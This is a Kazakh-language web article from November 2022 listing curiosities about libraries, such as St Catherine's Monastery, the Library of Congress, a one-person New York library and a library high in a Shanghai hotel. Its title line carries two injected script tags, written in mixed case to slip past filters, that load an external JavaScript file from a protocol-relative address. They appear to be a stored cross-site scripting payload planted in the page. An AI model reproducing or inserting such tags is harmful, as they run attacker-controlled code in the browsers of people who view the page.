Әлемдегі кітапханалар туралы қызықты деректер<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>
14.11.2022
Әлемдегі кітапханалар туралы қызықты деректер
- Ең көне кітапхана Египеттің Синай түбегінде орналасқан. Бұл Әулие Екатерина ғибадатханасының кітапханасы. Ол 6-шы ғасырдың ортасында салынған және әлемдегі екінші діни орынға айналды (Ватиканнан кейін). Кітапхананың есігі қарапайым адамдар үшін жабық, сондықтан ондағы әдебиетті алуға тек монахтар мен шақырылған студенттерге ғана рұқсат етілген.
- Әлемдегі ең үлкен кітапхана – АҚШ конгресінің кітапханасы. Оның қорында 158 миллионға жуық кітап бар. Оларға жай ғана көз жүгіртіп өту үшін 130 жылдай уақыт қажет.
- Әлемдегі ең шағын кітапханалар Нью-Йоркте орналасқан, онда тек бір адамға ғана шақталған орын бар. Қорда бар-жоғы 40 кітап тұр. Шағын кітапхананың мақсаты – мегаполис тұрғындарына қаланың қайнаған өмірі мен қарбалас тіршілігінен аз уақытқа болсын демалуға көмектесу. Инновациялық кітапхана қорындағы әдебиеттердің арнайы қорғаныш мұқабасы бар.
- Әлемдегі ең биік кітапхана Шанхай қонақ үйінде, 230 метр биіктікте орналасқан. Қорда қытай және ағылшын шығармаларының коллекциясы сақталған. Алайда кітапхананың ауданы небары 57 шаршы метрді құрайды.
Просмотров: 800